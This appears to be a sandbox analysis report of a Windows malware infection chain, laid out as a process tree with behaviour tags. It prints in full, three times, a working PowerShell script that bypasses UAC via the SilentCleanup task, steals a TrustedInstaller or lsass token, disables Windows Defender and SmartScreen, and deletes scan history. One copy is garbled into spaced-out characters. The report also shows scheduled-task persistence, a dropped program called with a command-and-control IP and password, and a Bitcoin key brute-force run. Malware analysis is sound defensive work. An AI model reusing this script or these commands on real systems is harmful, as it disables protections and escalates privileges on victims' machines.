C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Maintains.pub + ..\Legislation.pub + ..\Blood.pub + ..\Document.pub + ..\Breaks.pub + ..\Both.pub + ..\Explicitly.pub + ..\Governor.pub + ..\Bull.pub + ..\Comparison.pub + ..\Performing.pub + ..\Gate.pub + ..\Republican.pub + ..\Reverse.pub + ..\Thousand.pub + ..\Apartments.pub + ..\Swingers.pub + ..\Urban.pub + ..\Robert.pub + ..\Regulation.pub + ..\Confusion.pub + ..\Listening.pub + ..\Generating.pub + ..\Argentina.pub + ..\Amenities.pub + ..\Vacation.pub + ..\Vampire.pub + ..\Trademarks.pub + ..\Distinguished.pub + ..\Silly.pub + ..\Hell.pub + ..\Worcester.pub + ..\Concept.pub + ..\Enlarge.pub + ..\Preference.pub + ..\Poem.pub m9⤵
- System Location Discovery: System Language Discovery
PID:5992
-
-
C:\Users\Admin\AppData\Local\Temp\353090\Seat.comSeat.com m9⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4720 -
C:\Users\Admin\AppData\Local\Temp\353090\RegAsm.exeC:\Users\Admin\AppData\Local\Temp\353090\RegAsm.exe10⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5968 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5968 -s 142811⤵
- Program crash
PID:7248
-
-
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 59⤵
- System Location Discovery: System Language Discovery
PID:4596
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10206720101\9JFiKVm.exe"C:\Users\Admin\AppData\Local\Temp\10206720101\9JFiKVm.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:6416 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"8⤵
- System Location Discovery: System Language Discovery
PID:4444 -
C:\Users\Admin\AppData\Roaming\D9ohTv4jcH.exe"C:\Users\Admin\AppData\Roaming\D9ohTv4jcH.exe"9⤵
- UAC bypass
- Checks computer location settings
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of SetWindowsHookEx
- System policy modification
PID:6728 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc @(echo off%)[1]
sp 'HKCU:\Volatile Environment' 'ToggleDefender' @'
if ($(sc.exe qc windefend) -like '*TOGGLE*') {$TOGGLE=7;$KEEP=6;$A='Enable';$S='OFF'}else{$TOGGLE=6;$KEEP=7;$A='Disable';$S='ON'}

if ($env:1 -ne 6 -and $env:1 -ne 7) { $env:1=$TOGGLE }

start cmd -args '/d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"' -win 1

$notif='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance'
ni $notif -ea 0|out-null; ri $notif.replace('Settings','Current') -Recurse -Force -ea 0
sp $notif Enabled 0 -Type Dword -Force -ea 0; if ($TOGGLE -eq 7) {rp $notif Enabled -Force -ea 0}

$ts=New-Object -ComObject 'Schedule.Service'; $ts.Connect(); $baffling=$ts.GetFolder('\Microsoft\Windows\DiskCleanup')
$bpass=$baffling.GetTask('SilentCleanup'); $flaw=$bpass.Definition

$u=0;$w=whoami /groups;if($w-like'*1-5-32-544*'){$u=1};if($w-like'*1-16-12288*'){$u=2};if($w-like'*1-16-16384*'){$u=3}

$r=[char]13; $nfo=[char]39+$r+' (\   /)'+$r+'( * . * )  A limited account protects you from UAC exploits'+$r+'    ```'+$r+[char]39
$script='-nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo='+$nfo+';$env:1='+$env:1; $env:__COMPAT_LAYER='Installer'
$script+=';iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}'; $cmd='powershell '+$script

if ($u -eq 0) {
  start powershell -args $script -verb runas -win 1; break
}
if ($u -eq 1) {
  if ($flaw.Actions.Item(1).Path -inotlike '*windir*'){start powershell -args $script -verb runas -win 1; break}
  sp hkcu:\environment windir $('powershell '+$script+' #')
  $z=$bpass.RunEx($null,2,0,$null); $wait=0; while($bpass.State -gt 3 -and $wait -lt 17){sleep -m 100; $wait+=0.1}
  if(gp hkcu:\environment windir -ea 0){rp hkcu:\environment windir -ea 0;start powershell -args $script -verb runas -win 1};break
}
if ($u -eq 2) {
  $A=[AppDomain]::CurrentDomain."Def`ineDynamicAssembly"(1,1)."Def`ineDynamicModule"(1);$D=@();0..5|%{$D+=$A."Def`ineType"('A'+$_,
  1179913,[ValueType])} ;4,5|%{$D+=$D[$_]."Mak`eByRefType"()} ;$I=[Int32];$J="Int`Ptr";$P=$I.module.GetType("System.$J"); $F=@(0)
  $F+=($P,$I,$P),($I,$I,$I,$I,$P,$D[1]),($I,$P,$P,$P,$I,$I,$I,$I,$I,$I,$I,$I,[Int16],[Int16],$P,$P,$P,$P),($D[3],$P),($P,$P,$I,$I)
     $ S = [ S t r i n g ] ;   $ 9 = $ D [ 0 ] . " D e f ` i n e P I n v o k e M e t h o d " ( ' C r e a t e P r o c e s s ' , " k e r n e l ` 3 2 " , 8 2 1 4 , 1 , $ I , @ ( $ S , $ S , $ I , $ I , $ I , $ I , $ I , $ S , $ D [ 6 ] , $ D [ 7 ] ) , 1 , 4 )  
     1 . . 5 | % { $ k = $ _ ; $ n = 1 ; $ F [ $ _ ] | % { $ 9 = $ D [ $ k ] . " D e f ` i n e F i e l d " ( ' f ' + $ n + + , $ _ , 6 ) } } ; $ T = @ ( ) ; 0 . . 5 | % { $ T + = $ D [ $ _ ] . " C r ` e a t e T y p e " ( ) ; $ Z = [ u i n t p t r ] : : s i z e  
     n v   ( ' T ' + $ _ ) ( [ A c t i v a t o r ] : : C r e a t e I n s t a n c e ( $ T [ $ _ ] ) ) } ;   $ H = $ I . m o d u l e . G e t T y p e ( " S y s t e m . R u n t i m e . I n t e r o p ` S e r v i c e s . M a r ` s h a l " ) ;  
     $ W P = $ H . " G e t ` M e t h o d " ( " W r i t e $ J " , [ t y p e [ ] ] ( $ J , $ J ) ) ;   $ H G = $ H . " G e t ` M e t h o d " ( " A l l o c H ` G l o b a l " , [ t y p e [ ] ] ' i n t 3 2 ' ) ;   $ v = $ H G . i n v o k e ( $ n u l l , $ Z )  
     ' T r u s t e d I n s t a l l e r ' , ' l s a s s ' | % { i f ( ! $ p n ) { n e t 1   s t a r t   $ _   2 > & 1   > $ n u l l ; $ p n = [ D i a g n o s t i c s . P r o c e s s ] : : G e t P r o c e s s e s B y N a m e ( $ _ ) [ 0 ] ; } }  
     $ W P . i n v o k e ( $ n u l l , @ ( $ v , $ p n . H a n d l e ) ) ;   $ S Z = $ H . " G e t ` M e t h o d " ( " S i z e O f " , [ t y p e [ ] ] ' t y p e ' ) ;   $ T 1 . f 1 = 1 3 1 0 7 2 ;   $ T 1 . f 2 = $ Z ;   $ T 1 . f 3 = $ v ;   $ T 2 . f 1 = 1  
     $ T 2 . f 2 = 1 ; $ T 2 . f 3 = 1 ; $ T 2 . f 4 = 1 ; $ T 2 . f 6 = $ T 1 ; $ T 3 . f 1 = $ S Z . i n v o k e ( $ n u l l , $ T [ 4 ] ) ; $ T 4 . f 1 = $ T 3 ; $ T 4 . f 2 = $ H G . i n v o k e ( $ n u l l , $ S Z . i n v o k e ( $ n u l l , $ T [ 2 ] ) )  
     $ H . " G e t ` M e t h o d " ( " S t r u c t u r e T o ` P t r " , [ t y p e [ ] ] ( $ D [ 2 ] , $ J , ' b o o l e a n ' ) ) . i n v o k e ( $ n u l l , @ ( ( $ T 2 - a s   $ D [ 2 ] ) , $ T 4 . f 2 , $ f a l s e ) ) ; $ w i n d o w = 0 x 0 E 0 8 0 6 0 0  
     $ 9 = $ T [ 0 ] . " G e t ` M e t h o d " ( ' C r e a t e P r o c e s s ' ) . I n v o k e ( $ n u l l , @ ( $ n u l l , $ c m d , 0 , 0 , 0 , $ w i n d o w , 0 , $ n u l l , ( $ T 4 - a s   $ D [ 4 ] ) , ( $ T 5 - a s   $ D [ 5 ] ) ) ) ;   b r e a k  
 }  
  
 $ w d p = ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '  
 '   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s ' , ' \ U X   C o n f i g u r a t i o n ' , ' \ M p E n g i n e ' , ' \ S p y n e t ' , ' \ R e a l - T i m e   P r o t e c t i o n '   | %   { n i   ( $ w d p + $ _ ) - e a   0 | o u t - n u l l }  
  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s '   D i s a b l e N o t i f i c a t i o n s   1   - T y p e   D w o r d   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ U X   C o n f i g u r a t i o n '   N o t i f i c a t i o n _ S u p p r e s s   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s '   D i s a b l e N o t i f i c a t i o n s   1   - T y p e   D w o r d   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ U X   C o n f i g u r a t i o n '   N o t i f i c a t i o n _ S u p p r e s s   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s \ S y s t e m '   E n a b l e S m a r t S c r e e n   0   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '   D i s a b l e A n t i S p y w a r e   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '   D i s a b l e A n t i S p y w a r e   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 n e t 1   s t o p   w i n d e f e n d  
 s c . e x e   c o n f i g   w i n d e f e n d   d e p e n d =   R p c S s - T O G G L E  
 k i l l   - N a m e   M p C m d R u n   - F o r c e   - e a   0  
 s t a r t   ( $ e n v : P r o g r a m F i l e s + ' \ W i n d o w s   D e f e n d e r \ M p C m d R u n . e x e ' )   - A r g   ' - D i s a b l e S e r v i c e '   - w i n   1  
 d e l   ( $ e n v : P r o g r a m D a t a + ' \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ S c a n s \ m p e n g i n e d b . d b ' )   - F o r c e   - e a   0                       # #   C o m m e n t e d   =   k e e p   s c a n   h i s t o r y  
 d e l   ( $ e n v : P r o g r a m D a t a + ' \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ S c a n s \ H i s t o r y \ S e r v i c e ' )   - R e c u r s e   - F o r c e   - e a   0  
 ' @   - F o r c e   - e a   0 ;   i e x ( ( g p   R e g i s t r y : : H K E Y _ U s e r s \ S - 1 - 5 - 2 1 * \ V o l a t i l e *   T o g g l e D e f e n d e r   - e a   0 ) [ 0 ] . T o g g l e D e f e n d e r )  
 # - _ - # 10⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:8156 -
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" qc windefend11⤵
- Launches sc.exe
PID:8892
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"11⤵PID:9024
-
-
C:\Windows\system32\whoami.exe"C:\Windows\system32\whoami.exe" /groups11⤵PID:5160
-
-
C:\Windows\system32\net1.exe"C:\Windows\system32\net1.exe" start TrustedInstaller11⤵PID:9440
-
-
C:\Windows\system32\net1.exe"C:\Windows\system32\net1.exe" start lsass11⤵PID:9644
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc @(echo off%)[1]
sp 'HKCU:\Volatile Environment' 'ToggleDefender' @'
if ($(sc.exe qc windefend) -like '*TOGGLE*') {$TOGGLE=7;$KEEP=6;$A='Enable';$S='OFF'}else{$TOGGLE=6;$KEEP=7;$A='Disable';$S='ON'}

if ($env:1 -ne 6 -and $env:1 -ne 7) { $env:1=$TOGGLE }

start cmd -args '/d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"' -win 1

$notif='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance'
ni $notif -ea 0|out-null; ri $notif.replace('Settings','Current') -Recurse -Force -ea 0
sp $notif Enabled 0 -Type Dword -Force -ea 0; if ($TOGGLE -eq 7) {rp $notif Enabled -Force -ea 0}

$ts=New-Object -ComObject 'Schedule.Service'; $ts.Connect(); $baffling=$ts.GetFolder('\Microsoft\Windows\DiskCleanup')
$bpass=$baffling.GetTask('SilentCleanup'); $flaw=$bpass.Definition

$u=0;$w=whoami /groups;if($w-like'*1-5-32-544*'){$u=1};if($w-like'*1-16-12288*'){$u=2};if($w-like'*1-16-16384*'){$u=3}

$r=[char]13; $nfo=[char]39+$r+' (\   /)'+$r+'( * . * )  A limited account protects you from UAC exploits'+$r+'    ```'+$r+[char]39
$script='-nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo='+$nfo+';$env:1='+$env:1; $env:__COMPAT_LAYER='Installer'
$script+=';iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}'; $cmd='powershell '+$script

if ($u -eq 0) {
    start powershell -args $script -verb runas -win 1; break
}
if ($u -eq 1) {
    if ($flaw.Actions.Item(1).Path -inotlike '*windir*'){start powershell -args $script -verb runas -win 1; break}
    sp hkcu:\environment windir $('powershell '+$script+' #')
    $z=$bpass.RunEx($null,2,0,$null); $wait=0; while($bpass.State -gt 3 -and $wait -lt 17){sleep -m 100; $wait+=0.1}
    if(gp hkcu:\environment windir -ea 0){rp hkcu:\environment windir -ea 0;start powershell -args $script -verb runas -win 1};break
}
if ($u -eq 2) {
    $A=[AppDomain]::CurrentDomain."Def`ineDynamicAssembly"(1,1)."Def`ineDynamicModule"(1);$D=@();0..5|%{$D+=$A."Def`ineType"('A'+$_,
    1179913,[ValueType])} ;4,5|%{$D+=$D[$_]."Mak`eByRefType"()} ;$I=[Int32];$J="Int`Ptr";$P=$I.module.GetType("System.$J"); $F=@(0)
    $F+=($P,$I,$P),($I,$I,$I,$I,$P,$D[1]),($I,$P,$P,$P,$I,$I,$I,$I,$I,$I,$I,$I,[Int16],[Int16],$P,$P,$P,$P),($D[3],$P),($P,$P,$I,$I)
    $S=[String]; $9=$D[0]."Def`inePInvokeMethod"('CreateProcess',"kernel`32",8214,1,$I,@($S,$S,$I,$I,$I,$I,$I,$S,$D[6],$D[7]),1,4)
    1..5|%{$k=$_;$n=1;$F[$_]|%{$9=$D[$k]."Def`ineField"('f'+$n++,$_,6)}};$T=@();0..5|%{$T+=$D[$_]."Cr`eateType"();$Z=[uintptr]::size
    nv ('T'+$_)([Activator]::CreateInstance($T[$_]))}; $H=$I.module.GetType("System.Runtime.Interop`Services.Mar`shal");
    $WP=$H."Get`Method"("Write$J",[type[]]($J,$J)); $HG=$H."Get`Method"("AllocH`Global",[type[]]'int32'); $v=$HG.invoke($null,$Z)
    'TrustedInstaller','lsass'|%{if(!$pn){net1 start $_ 2>&1 >$null;$pn=[Diagnostics.Process]::GetProcessesByName($_)[0];}}
    $WP.invoke($null,@($v,$pn.Handle)); $SZ=$H."Get`Method"("SizeOf",[type[]]'type'); $T1.f1=131072; $T1.f2=$Z; $T1.f3=$v; $T2.f1=1
    $T2.f2=1;$T2.f3=1;$T2.f4=1;$T2.f6=$T1;$T3.f1=$SZ.invoke($null,$T[4]);$T4.f1=$T3;$T4.f2=$HG.invoke($null,$SZ.invoke($null,$T[2]))
    $H."Get`Method"("StructureTo`Ptr",[type[]]($D[2],$J,'boolean')).invoke($null,@(($T2-as $D[2]),$T4.f2,$false));$window=0x0E080600
    $9=$T[0]."Get`Method"('CreateProcess').Invoke($null,@($null,$cmd,0,0,0,$window,0,$null,($T4-as $D[4]),($T5-as $D[5]))); break
}

$wdp='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender'
' Security Center\Notifications','\UX Configuration','\MpEngine','\Spynet','\Real-Time Protection' |% {ni ($wdp+$_)-ea 0|out-null}

sp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications' DisableNotifications 1 -Type Dword -ea 0
sp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration' Notification_Suppress 1 -Type Dword -Force -ea 0
sp 'HKLM:\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications' DisableNotifications 1 -Type Dword -ea 0
sp 'HKLM:\SOFTWARE\Microsoft\Windows Defender\UX Configuration' Notification_Suppress 1 -Type Dword -Force -ea 0
sp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\System' EnableSmartScreen 0 -Type Dword -Force -ea 0
sp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' DisableAntiSpyware 1 -Type Dword -Force -ea 0
sp 'HKLM:\SOFTWARE\Microsoft\Windows Defender' DisableAntiSpyware 1 -Type Dword -Force -ea 0
net1 stop windefend
sc.exe config windefend depend= RpcSs-TOGGLE
kill -Name MpCmdRun -Force -ea 0
start ($env:ProgramFiles+'\Windows Defender\MpCmdRun.exe') -Arg '-DisableService' -win 1
del ($env:ProgramData+'\Microsoft\Windows Defender\Scans\mpenginedb.db') -Force -ea 0           ## Commented = keep scan history
del ($env:ProgramData+'\Microsoft\Windows Defender\Scans\History\Service') -Recurse -Force -ea 0
'@ -Force -ea 0; iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)
#-_-# 10⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:4824 -
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" qc windefend11⤵
- Launches sc.exe
PID:8868
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"11⤵PID:8976
-
-
C:\Windows\system32\whoami.exe"C:\Windows\system32\whoami.exe" /groups11⤵PID:9268
-
-
C:\Windows\system32\net1.exe"C:\Windows\system32\net1.exe" start TrustedInstaller11⤵PID:9548
-
-
C:\Windows\system32\net1.exe"C:\Windows\system32\net1.exe" start lsass11⤵PID:10228
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc @(echo off%)[1]
sp 'HKCU:\Volatile Environment' 'ToggleDefender' @'
if ($(sc.exe qc windefend) -like '*TOGGLE*') {$TOGGLE=7;$KEEP=6;$A='Enable';$S='OFF'}else{$TOGGLE=6;$KEEP=7;$A='Disable';$S='ON'}

if ($env:1 -ne 6 -and $env:1 -ne 7) { $env:1=$TOGGLE }

start cmd -args '/d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"' -win 1

$notif='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance'
ni $notif -ea 0|out-null; ri $notif.replace('Settings','Current') -Recurse -Force -ea 0
sp $notif Enabled 0 -Type Dword -Force -ea 0; if ($TOGGLE -eq 7) {rp $notif Enabled -Force -ea 0}

$ts=New-Object -ComObject 'Schedule.Service'; $ts.Connect(); $baffling=$ts.GetFolder('\Microsoft\Windows\DiskCleanup')
$bpass=$baffling.GetTask('SilentCleanup'); $flaw=$bpass.Definition

$u=0;$w=whoami /groups;if($w-like'*1-5-32-544*'){$u=1};if($w-like'*1-16-12288*'){$u=2};if($w-like'*1-16-16384*'){$u=3}

$r=[char]13; $nfo=[char]39+$r+' (\   /)'+$r+'( * . * )  A limited account protects you from UAC exploits'+$r+'    ```'+$r+[char]39
$script='-nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo='+$nfo+';$env:1='+$env:1; $env:__COMPAT_LAYER='Installer'
$script+=';iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}'; $cmd='powershell '+$script

if ($u -eq 0) {
    start powershell -args $script -verb runas -win 1; break
}
if ($u -eq 1) {
    if ($flaw.Actions.Item(1).Path -inotlike '*windir*'){start powershell -args $script -verb runas -win 1; break}
    sp hkcu:\environment windir $('powershell '+$script+' #')
    $z=$bpass.RunEx($null,2,0,$null); $wait=0; while($bpass.State -gt 3 -and $wait -lt 17){sleep -m 100; $wait+=0.1}
    if(gp hkcu:\environment windir -ea 0){rp hkcu:\environment windir -ea 0;start powershell -args $script -verb runas -win 1};break
}
if ($u -eq 2) {
    $A=[AppDomain]::CurrentDomain."Def`ineDynamicAssembly"(1,1)."Def`ineDynamicModule"(1);$D=@();0..5|%{$D+=$A."Def`ineType"('A'+$_,
    1179913,[ValueType])} ;4,5|%{$D+=$D[$_]."Mak`eByRefType"()} ;$I=[Int32];$J="Int`Ptr";$P=$I.module.GetType("System.$J"); $F=@(0)
    $F+=($P,$I,$P),($I,$I,$I,$I,$P,$D[1]),($I,$P,$P,$P,$I,$I,$I,$I,$I,$I,$I,$I,[Int16],[Int16],$P,$P,$P,$P),($D[3],$P),($P,$P,$I,$I)
    $S=[String]; $9=$D[0]."Def`inePInvokeMethod"('CreateProcess',"kernel`32",8214,1,$I,@($S,$S,$I,$I,$I,$I,$I,$S,$D[6],$D[7]),1,4)
    1..5|%{$k=$_;$n=1;$F[$_]|%{$9=$D[$k]."Def`ineField"('f'+$n++,$_,6)}};$T=@();0..5|%{$T+=$D[$_]."Cr`eateType"();$Z=[uintptr]::size
    nv ('T'+$_)([Activator]::CreateInstance($T[$_]))}; $H=$I.module.GetType("System.Runtime.Interop`Services.Mar`shal");
    $WP=$H."Get`Method"("Write$J",[type[]]($J,$J)); $HG=$H."Get`Method"("AllocH`Global",[type[]]'int32'); $v=$HG.invoke($null,$Z)
    'TrustedInstaller','lsass'|%{if(!$pn){net1 start $_ 2>&1 >$null;$pn=[Diagnostics.Process]::GetProcessesByName($_)[0];}}
    $WP.invoke($null,@($v,$pn.Handle)); $SZ=$H."Get`Method"("SizeOf",[type[]]'type'); $T1.f1=131072; $T1.f2=$Z; $T1.f3=$v; $T2.f1=1
    $T2.f2=1;$T2.f3=1;$T2.f4=1;$T2.f6=$T1;$T3.f1=$SZ.invoke($null,$T[4]);$T4.f1=$T3;$T4.f2=$HG.invoke($null,$SZ.invoke($null,$T[2]))
    $H."Get`Method"("StructureTo`Ptr",[type[]]($D[2],$J,'boolean')).invoke($null,@(($T2-as $D[2]),$T4.f2,$false));$window=0x0E080600
    $9=$T[0]."Get`Method"('CreateProcess').Invoke($null,@($null,$cmd,0,0,0,$window,0,$null,($T4-as $D[4]),($T5-as $D[5]))); break
}

$wdp='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender'
' Security Center\Notifications','\UX Configuration','\MpEngine','\Spynet','\Real-Time Protection' |% {ni ($wdp+$_)-ea 0|out-null}

sp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications' DisableNotifications 1 -Type Dword -ea 0
sp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration' Notification_Suppress 1 -Type Dword -Force -ea 0
sp 'HKLM:\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications' DisableNotifications 1 -Type Dword -ea 0
sp 'HKLM:\SOFTWARE\Microsoft\Windows Defender\UX Configuration' Notification_Suppress 1 -Type Dword -Force -ea 0
sp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\System' EnableSmartScreen 0 -Type Dword -Force -ea 0
sp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' DisableAntiSpyware 1 -Type Dword -Force -ea 0
sp 'HKLM:\SOFTWARE\Microsoft\Windows Defender' DisableAntiSpyware 1 -Type Dword -Force -ea 0
net1 stop windefend
sc.exe config windefend depend= RpcSs-TOGGLE
kill -Name MpCmdRun -Force -ea 0
start ($env:ProgramFiles+'\Windows Defender\MpCmdRun.exe') -Arg '-DisableService' -win 1
del ($env:ProgramData+'\Microsoft\Windows Defender\Scans\mpenginedb.db') -Force -ea 0           ## Commented = keep scan history
del ($env:ProgramData+'\Microsoft\Windows Defender\Scans\History\Service') -Recurse -Force -ea 0
'@ -Force -ea 0; iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)
#-_-# 10⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:8176 -
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" qc windefend11⤵
- Launches sc.exe
PID:8844
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"11⤵PID:8992
-
-
C:\Windows\system32\whoami.exe"C:\Windows\system32\whoami.exe" /groups11⤵PID:9320
-
-
C:\Windows\system32\net1.exe"C:\Windows\system32\net1.exe" start TrustedInstaller11⤵PID:9400
-
-
C:\Windows\system32\net1.exe"C:\Windows\system32\net1.exe" start lsass11⤵PID:9720
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10206730101\st22BJg.exe"C:\Users\Admin\AppData\Local\Temp\10206730101\st22BJg.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
PID:12452 -
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" "C:\Users\Admin\AppData\Local\Temp\pack82.vbe"8⤵
- Blocklisted process makes network request
- Downloads MZ/PE file
- Checks computer location settings
PID:12600 -
[level 9] C:\Windows\System32\schtasks.exe
  Command line: "C:\Windows\System32\schtasks.exe" /create /ru system /tn Microsoft\Windows\Shell\WindowsObjectChecking /sc onstart /tr "C:\Users\Admin\AppData\Roaming\B8AD0ED6F593F823EEB273FFBD548993\406B95324F84EF027D0E7A51C567FEAC.vbe" /f /rl highest
  - Scheduled Task/Job: Scheduled Task
  PID: 6108

[level 9] C:\Users\Admin\AppData\Local\Temp\System.{BB06C0E4-D293-4f75-8A90-CB05B6477EEE}\Security Protection Windows.pif
  Command line: "C:\Users\Admin\AppData\Local\Temp\System.{BB06C0E4-D293-4f75-8A90-CB05B6477EEE}\Security Protection Windows.pif" 95.168.166.227:8082:admin:12r3sa6qf9
  - Executes dropped EXE
  PID: 6392

[level 10] C:\Windows\SYSTEM32\cmd.exe
  Command line: cmd.exe /c OpenCL.pif -c --continue save.txt --keyspace 00000000000000000000000000000000000000000000001CDAB06A52CB4C4000:00000000000000000000000000000000000000000000001CDAB06DF61DE07FFF -b 0 -t 0 -p 0 19vkiEajfhuZ8bs8Zu2jgmC6oqZbWqhxhG 2>&1 | powershell -Command "$input | Select-Object -Last 9 | Add-Content keyc.txt"
  PID: 6244

[level 11] C:\Users\Admin\AppData\Local\Temp\OpenCL.pif
  Command line: OpenCL.pif -c --continue save.txt --keyspace 00000000000000000000000000000000000000000000001CDAB06A52CB4C4000:00000000000000000000000000000000000000000000001CDAB06DF61DE07FFF -b 0 -t 0 -p 0 19vkiEajfhuZ8bs8Zu2jgmC6oqZbWqhxhG
  - Executes dropped EXE
  PID: 6212

[level 11] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: powershell -Command "$input | Select-Object -Last 9 | Add-Content keyc.txt"
  - Command and Scripting Interpreter: PowerShell
  PID: 6192

[level 10] C:\Windows\SYSTEM32\cmd.exe
  Command line: cmd.exe /c OpenCL.pif -c --continue save.txt --keyspace 00000000000000000000000000000000000000000000001CB5DA9E3136ED8000:00000000000000000000000000000000000000000000001CB5DAA1D48981BFFF -b 0 -t 0 -p 0 19vkiEajfhuZ8bs8Zu2jgmC6oqZbWqhxhG 2>&1 | powershell -Command "$input | Select-Object -Last 9 | Add-Content keyc.txt"
  PID: 10300

[level 11] C:\Users\Admin\AppData\Local\Temp\OpenCL.pif
  Command line: OpenCL.pif -c --continue save.txt --keyspace 00000000000000000000000000000000000000000000001CB5DA9E3136ED8000:00000000000000000000000000000000000000000000001CB5DAA1D48981BFFF -b 0 -t 0 -p 0 19vkiEajfhuZ8bs8Zu2jgmC6oqZbWqhxhG
  - Executes dropped EXE
  PID: 9896

[level 11] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: powershell -Command "$input | Select-Object -Last 9 | Add-Content keyc.txt"
  - Command and Scripting Interpreter: PowerShell
  PID: 9592

[level 8] C:\Users\Admin\AppData\Local\Temp\file.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\file.exe"
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID: 12704

[level 9] C:\Users\Admin\AppData\Local\Temp\ShortcutTaskAgent.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\ShortcutTaskAgent.exe"
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID: 6604

